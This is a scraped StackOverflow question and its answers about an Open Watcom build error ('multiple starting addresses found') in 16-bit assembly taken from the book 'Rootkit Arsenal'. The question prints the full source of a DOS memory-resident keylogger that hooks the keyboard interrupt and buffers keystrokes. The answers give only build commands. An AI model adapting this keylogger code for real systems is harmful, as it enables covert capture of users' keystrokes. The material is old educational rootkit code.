Compiling 16-bit assembly code with open watcom error (multiple starting addresses found)

StackOverflow https://stackoverflow.com/questions/13429805

Question

I am trying to compile a 16-bit assembly code snippet from the book rootkit arsenal in open watcom IDE. It gives the error "multiple starting addresses found". Having very limited amount of assembly knowledge i have not been able to sort it out. This is the code:

CSEG SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CSEG,DS:CSEG,SS:CSEG
ORG 100H


_here:

JMP _main
JMP _overData

_buffer DB 512 DUP('W')
_terminator DB 'Z'
_index DW 0H
_oldISR DD 0H
_chkISR DD 0h
_overData:


_getBufferAddr:

STI
MOV DX, CS
LEA DI,_buffer
IRET


_hookBIOS:

PUSH AX
PUSH BX

PUSHF 
CALL CS:_oldISR

MOV AH, 01H
PUSHF
CALL CS:_chkISR

CLI
PUSH DS 
PUSH CS
POP DS

jz _hb_Exit 
LEA BX,_buffer
PUSH SI
MOV SI,WORD PTR[_index]
MOV DS:[BX+SI],AL
INC SI
MOV WORD PTR[_index], SI
POP SI


_hb_Exit:

POP DS
POP AX
POP BX

STI
IRET


_install:

LEA DX,_getBufferAddr
MOV CX,CS
MOV DS,CX
MOV AH,25H
MOV AL,187
INT 21H

MOV AH,35H
MOV AL,9H
INT 21H
MOV WORD PTR _oldISR[0],BX
MOV WORD PTR _oldISR[2],ES

MOV AH, 35H
MOV AL,16H
INT 21H
MOV WORD PTR _chkISR[0],BX
MOV WORD PTR _chkISR[2],ES

MOV AH,25H
MOV AL,9H
MOV CX,CS
MOV DS,CX
LEA DX,_hookBIOS
INT 21H

RET

PUBLIC _main


_main:

PUSH BP
MOV BP,SP
MOV AX,CS
MOV SS,AX
LEA AX,_localStk
ADD AX,100H

CALL NEAR PTR _install

MOV AH, 31H
MOV AL,0
MOV DX, 200H
INT 21H

POP BP
RET

PUBLIC _localStk
_localStk DB 256 DUP(?)

CSEG ENDS
END _here

Kindly, help me out.

Était-ce utile?

La solution

Sorry for the late reply, but I just figured this out and posted a solution on another StackOverflow question asking a similar question:

Compiling real mode asm (rootkit.arsenal)

Autres conseils

What I do to build .com files with OpenWatcom is to compile the assembly file with wasm and then use wlink.

wasm hello.asm
wlink sys dos com file hello.o

Here the object file has the extension .o which is what wasm produces on Linux. In DOS, Windows and OS/2 it'll probably be .obj so adjust the command line as appropriate for your system.

I use .model tiny and .286p at the start and leave out the CSEG and ASSUME lines. I suppose that doesn't matter though.

Licencié sous: CC-BY-SA avec attribution
Non affilié à StackOverflow
scroll top